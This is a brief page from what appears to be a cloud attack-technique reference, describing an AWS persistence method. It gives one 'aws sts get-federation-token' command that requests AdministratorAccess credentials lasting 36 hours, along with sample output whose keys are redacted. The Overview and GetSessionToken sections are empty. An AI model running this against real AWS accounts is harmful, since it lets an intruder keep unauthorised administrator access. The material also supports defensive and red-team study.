Generating Temporary AWS Credentials from IAM User
AWS persistence technique
Overview
sts:GetFederationToken
aws sts get-federation-token --name sally --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess --duration-seconds 129600
{
"Credentials": {
"AccessKeyId": "ASIA[REDACTED]",
"SecretAccessKey": "pZlpr[REDACTED]",
"SessionToken": "IQoJb3J[REDACTED]",
"Expiration": "2025-11-11T08:56:15+00:00"
},
"FederatedUser": {
"FederatedUserId": "111111111111:sally",
"Arn": "arn:aws:sts::111111111111:federated-user/sally"
},
"PackedPolicySize": 7
}sts:GetSessionToken
Last updated